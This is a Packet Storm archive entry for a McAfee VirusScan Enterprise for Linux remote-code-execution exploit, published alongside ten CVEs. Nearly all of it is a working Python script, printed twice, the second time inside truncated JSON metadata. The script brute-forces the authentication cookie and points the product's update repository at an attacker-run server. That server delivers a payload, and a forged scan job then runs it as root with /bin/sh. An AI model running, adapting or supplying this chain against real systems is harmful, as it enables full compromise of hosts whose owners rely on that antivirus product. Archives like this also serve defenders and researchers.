McAfee Virus Scan Enterprise For Linux Remote Code Execution
2016-12-14T00:00:00
ID PACKETSTORM:140147 Type packetstorm Reporter Andrew Fasano Modified 2016-12-14T00:00:00
Description
`Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chaned together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128' # Attacker IP for victim to connect back to
authorized_ip="127.0.0.1" # IP address cookie will be valid for
update_server_port = 8080 # Port update server listens on
delay_seconds = 10 # How long should the server take to serve the update
target_port = 55443 # Port to target
# Put payload script in payload.sh
# Initialization
payload_in_place = threading.Event()
requests.packages.urllib3.disable_warnings()
with open("payload.sh", "r") as f:
payload = f.read()
def pprint(inp, flag=False):
pad = "#"
if flag:
pad = "*"
print("\n" + pad+ " " + inp)
def crack_cookie():
pprint("Cracking Cookie")
# A page that requires authentication
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
# Start at the current time + 100 in case of recent login with clock skew
date_val = int(time.time()+100)
cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
# Make requests, print after every 600
while True:
cookie = cookie_fmt % date_val
req_cookie = {"nailsSessionId": cookie}
r = requests.get(url, cookies=req_cookie, verify=False)
r.raise_for_status()
if "Set-Cookie" in r.headers:
valid_cookie = cookie
timestamp = cookie.split("/")[3].split("-")[0]
break
elif date_val % 600 == 0:
print("Now trying %s" % time.asctime(time.localtime(date_val)))
date_val -= 1
pprint("Cookie Cracked: " + timestamp, True)
return valid_cookie
def update_update_server(auth_cookie):
pprint("Updating update server")
# Replace McAfeeHttp update server with attacker local_ip:update_server_port
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
+ "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
"posProperty=fallback&useOfProxy=on"
r = requests.get(url, cookies=auth_cookie, verify=False)
r.raise_for_status()
pprint("Updated update server", True)
def download_update(req_cookie):
pprint("Requesting target download payload")
# Send request to make target download payload
url = target_domain + ":" + str(target_port) + "/0409/nails"
updateName = "update_%d" % int(time.time())
postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
r.raise_for_status()
pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
pprint("Making target execute payload")
#### Get commit_id and ODS_name
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
r = requests.get(url, cookies=req_cookie, verify=False)
r.raise_for_status()
regex = re.search("\|digest=(.+?)\|", r.text)
if not regex:
print("\nERROR: Could not get commit_id when generating evil scan\n")
return False
commit_id = regex.groups(1)[0]
# Send request to start evil scan
payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
url = target_domain + ":" + str(target_port) + "/0409/nails"
ODS_name = "ODS_1" # This may need to be increased if the name already exists
scan_name = "scan_%s" % str(int(time.time()))
postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
"=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
r.raise_for_status()
pprint("Payload executed", 1)
def start_update_server():
class RequestHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
if s.path == "/catalog.z":
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(payload, "utf-8"))
pprint("Payload placed", 1)
payload_in_place.set()
# Die after sending payload so we send an incomplete response
raise KillServer
else: # Assume all other requests are for SiteStat - Always increasing version
s.send_response(200)
s.send_header("Content-type", "text/xml")
s.end_headers()
s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
"""<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
""" </SiteStatus>""") % int(time.time()), "utf-8"))
# Throwing KillServer will shutdown the server ungracefully
class KillServer(Exception):
def __str__(self):
return "Kill Server (not an error)"
# ThreadingMixIn plus support for KillServer exceptions
class AbortableThreadingMixIn(ThreadingMixIn):
def process_request_thread(self, request, client_address):
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except KillServer:
pprint("Killing update server dirtily")
self.shutdown_request(request)
self.shutdown() # Only if we want to shutdown
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
pass
pprint("Launching update server")
srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
threading.Thread(target=srv.serve_forever).start()
pprint("Update server started", 1)
return srv
####################################################################################
####################################################################################
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target downloads our payload,
payload_in_place.wait()
# Shutdown our update server
srv.shutdown()
# Execute /bin/sh -(?) catalog.z
exec_catalogz(auth_cookie)
`
{"id": "PACKETSTORM:140147", "published": "2016-12-14T00:00:00", "references": [], "type": "packetstorm", "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-12-14T02:03:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310106470"]}, {"type": "nessus", "idList": ["MCAFEE_VSEL_SB10181.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:40911"]}, {"type": "zdt", "idList": ["1337DAY-ID-26519"]}, {"type": "cert", "idList": ["VU:245327"]}, {"type": "cve", "idList": ["CVE-2016-8017", "CVE-2016-8018", "CVE-2016-8016", "CVE-2016-8025", "CVE-2016-8023", "CVE-2016-8024", "CVE-2016-8020", "CVE-2016-8021", "CVE-2016-8019", "CVE-2016-8022"]}, {"type": "saint", "idList": ["SAINT:9BB81EFD042AB3DA9DDEDA9585D54BE2", "SAINT:3F45369261059DA84B497885AF5B9BCB"]}], "modified": "2016-12-14T02:03:47"}, "vulnersScore": 7.7}, "cvelist": ["CVE-2016-8019", "CVE-2016-8024", "CVE-2016-8018", "CVE-2016-8020", "CVE-2016-8023", "CVE-2016-8016", "CVE-2016-8025", "CVE-2016-8021", "CVE-2016-8017", "CVE-2016-8022"], "sourceData": "`Source: https://nation.state.actor/mcafee.html \n \nVulnerabilities \n \nCVE-2016-8016: Remote Unauthenticated File Existence Test \nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints) \nCVE-2016-8018: No Cross-Site Request Forgery Tokens \nCVE-2016-8019: Cross Site Scripting \nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation \nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location \nCVE-2016-8022: Remote Use of Authentication Tokens \nCVE-2016-8023: Brute Force Authentication Tokens \nCVE-2016-8024: HTTP Response Splitting \nCVE-2016-8025: Authenticated SQL Injection \nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root. \n''' \n#!/bin/python3 \nimport time \nimport requests \nimport os \nimport sys \nimport re \nimport threading \nimport subprocess \nfrom http.server import BaseHTTPRequestHandler, HTTPServer \nfrom socketserver import ThreadingMixIn \n \n# Per-target configuration \ntarget_domain=\"https://10.0.1.130\" # https://target_ip \nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to \nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for \nupdate_server_port = 8080 # Port update server listens on \ndelay_seconds = 10 # How long should the server take to serve the update \ntarget_port = 55443 # Port to target \n \n# Put payload script in payload.sh \n \n# Initialization \npayload_in_place = threading.Event() \nrequests.packages.urllib3.disable_warnings() \nwith open(\"payload.sh\", \"r\") as f: \npayload = f.read() \n \ndef pprint(inp, flag=False): \npad = \"#\" \nif flag: \npad = \"*\" \nprint(\"\\n\" + pad+ \" \" + inp) \n \n \ndef crack_cookie(): \npprint(\"Cracking Cookie\") \n \n# A page that requires authentication \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\" \n \n# Start at the current time + 100 in case of recent login with clock skew \ndate_val = int(time.time()+100) \ncookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20 \n \n# Make requests, print after every 600 \nwhile True: \ncookie = cookie_fmt % date_val \nreq_cookie = {\"nailsSessionId\": cookie} \nr = requests.get(url, cookies=req_cookie, verify=False) \nr.raise_for_status() \n \nif \"Set-Cookie\" in r.headers: \nvalid_cookie = cookie \ntimestamp = cookie.split(\"/\")[3].split(\"-\")[0] \nbreak \n \nelif date_val % 600 == 0: \nprint(\"Now trying %s\" % time.asctime(time.localtime(date_val))) \n \ndate_val -= 1 \n \npprint(\"Cookie Cracked: \" + timestamp, True) \nreturn valid_cookie \n \n \ndef update_update_server(auth_cookie): \npprint(\"Updating update server\") \n \n# Replace McAfeeHttp update server with attacker local_ip:update_server_port \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\ \n\"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\ \n\"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\ \n\"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\ \n\"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\ \n\"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\ \n\"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\ \n\"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\ \n+ \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\ \n\"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\ \n\"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\ \n\"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\ \n\"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\ \n\"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\ \n\"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\ \n\"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\ \n\"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\ \n\"posProperty=fallback&useOfProxy=on\" \n \nr = requests.get(url, cookies=auth_cookie, verify=False) \nr.raise_for_status() \npprint(\"Updated update server\", True) \n \ndef download_update(req_cookie): \npprint(\"Requesting target download payload\") \n \n# Send request to make target download payload \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails\" \n \nupdateName = \"update_%d\" % int(time.time()) \npostdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\ \n\"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\ \n\"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\ \n\"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\ \n\"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\ \n\"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\ \n\"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\ \n\"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\ \n\"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName) \n \nheaders = {'Content-Type': 'application/x-www-form-urlencoded'} \nr = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) \nr.raise_for_status() \n \npprint(\"Payload download requested\", 1) \n \n \ndef exec_catalogz(req_cookie): \npprint(\"Making target execute payload\") \n \n#### Get commit_id and ODS_name \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\ \n\".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\ \n\"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\ \n\"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\ \n\",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\ \n\"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\" \n \nr = requests.get(url, cookies=req_cookie, verify=False) \nr.raise_for_status() \n \nregex = re.search(\"\\|digest=(.+?)\\|\", r.text) \nif not regex: \nprint(\"\\nERROR: Could not get commit_id when generating evil scan\\n\") \nreturn False \n \ncommit_id = regex.groups(1)[0] \n \n# Send request to start evil scan \npayload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\" \nbinary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x \n \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails\" \n \nODS_name = \"ODS_1\" # This may need to be increased if the name already exists \nscan_name = \"scan_%s\" % str(int(time.time())) \n \npostdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\ \n\"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\ \n\"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\ \n\"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\ \n\".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\ \n\"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\ \n\"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\ \n\"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\ \n\"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\ \n\"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\ \n\"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\ \n\"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\ \n\"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\ \n\"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\ \n\"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\ \n\"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\ \n\"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\ \n\".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\ \n\"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\ \n\"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\ \n\".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\ \n\"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\ \n\"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\ \n\"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\ \n\"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\ \n\"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\ \n\"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\ \n\"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\ \n\"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\ \n\"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\ \n\"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path) \n \nheaders = {'Content-Type': 'application/x-www-form-urlencoded'} \nr = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) \nr.raise_for_status() \n \npprint(\"Payload executed\", 1) \n \ndef start_update_server(): \n \nclass RequestHandler(BaseHTTPRequestHandler): \ndef do_HEAD(s): \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/html\") \ns.end_headers() \n \ndef do_GET(s): \nif s.path == \"/catalog.z\": \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/html\") \ns.end_headers() \ns.wfile.write(bytes(payload, \"utf-8\")) \n \npprint(\"Payload placed\", 1) \n \npayload_in_place.set() \n \n# Die after sending payload so we send an incomplete response \nraise KillServer \n \nelse: # Assume all other requests are for SiteStat - Always increasing version \ns.send_response(200) \ns.send_header(\"Content-type\", \"text/xml\") \ns.end_headers() \ns.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\ \n\"\"\"<SiteStatus Status=\"Enabled\" CatalogVersion=\"2%d\">\"\"\" \\ \n\"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\")) \n \n# Throwing KillServer will shutdown the server ungracefully \nclass KillServer(Exception): \ndef __str__(self): \nreturn \"Kill Server (not an error)\" \n \n# ThreadingMixIn plus support for KillServer exceptions \nclass AbortableThreadingMixIn(ThreadingMixIn): \ndef process_request_thread(self, request, client_address): \ntry: \nself.finish_request(request, client_address) \nself.shutdown_request(request) \nexcept KillServer: \npprint(\"Killing update server dirtily\") \nself.shutdown_request(request) \nself.shutdown() # Only if we want to shutdown \nexcept: \nself.handle_error(request, client_address) \nself.shutdown_request(request) \n \n \nclass BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer): \npass \n \npprint(\"Launching update server\") \n \nsrv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler) \nthreading.Thread(target=srv.serve_forever).start() \n \npprint(\"Update server started\", 1) \nreturn srv \n \n \n#################################################################################### \n#################################################################################### \n \npprint(\"Attacking %s\" % target_domain, 1) \n \n# Crack the auth cookie 